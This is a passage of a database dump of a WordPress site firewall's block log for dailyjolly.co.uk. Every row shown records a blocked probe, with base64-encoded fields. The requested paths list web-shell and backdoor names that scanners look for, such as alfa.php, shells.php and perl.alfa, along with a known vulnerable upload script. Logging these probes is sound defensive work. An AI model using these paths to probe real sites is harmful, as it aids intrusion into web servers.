User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11517,1674014975.018221,1674014974.877800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11518,1674018803.556887,1674018803.424000,'\0\0\0\0\0\0\0\0\0\0���w��',0,403,0,0,0,'https://dailyjolly.co.uk/wordpress/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L3dvcmRwcmVzcy9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11519,1674029968.637506,1674029968.505000,'\0\0\0\0\0\0\0\0\0\0����l',0,403,0,0,0,'https://dailyjolly.co.uk/blog/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L2Jsb2cvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11520,1674051386.911556,1674051386.726400,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11521,1674051386.645507,1674051386.464700,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11522,1674051386.565650,1674051386.401100,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11523,1674051386.384112,1674051386.258200,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11524,1674051386.236233,1674051386.052200,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11525,1674051386.177506,1674051385.971900,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11526,1674051385.800237,1674051385.657600,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11527,1674051378.758788,1674051378.594500,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11528,1674051378.333493,1674051378.204800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11529,1674051650.741288,1674051650.188200,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHdoYXRzbXlyYW5rdmlkZW9yZWd1bGFyLXVubGltaXRlZC9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11530,1674051894.591878,1674051893.799900,'\0\0\0\0\0\0\0\0\0\0��M�M',0,403,0,0,0,'https://dailyjolly.co.uk/www/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L3d3dy9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11531,1674058783.171466,1674058783.054200,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11532,1674058782.973644,1674058782.820100,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11533,1674058782.830340,1674058782.684800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11534,1674058782.659917,1674058782.433600,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11535,1674058782.519472,1674058782.346800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11536,1674058782.273437,1674058782.067700,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11537,1674058781.905143,1674058781.732900,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11538,1674058780.986730,1674058780.819100,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11539,1674058780.583133,1674058780.418600,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11540,1674057782.395117,1674057782.267600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11541,1674057781.876120,1674057781.729900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11542,1674057781.328585,1674057781.217400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11543,1674057780.823000,1674057780.713300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11544,1674057780.313243,1674057780.205200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11545,1674057779.813265,1674057779.699200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11546,1674057779.305024,1674057779.194500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11547,1674057778.798429,1674057778.683500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11548,1674057778.286923,1674057778.178800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11549,1674057777.769853,1674057777.659800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11550,1674057777.266391,1674057777.158300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 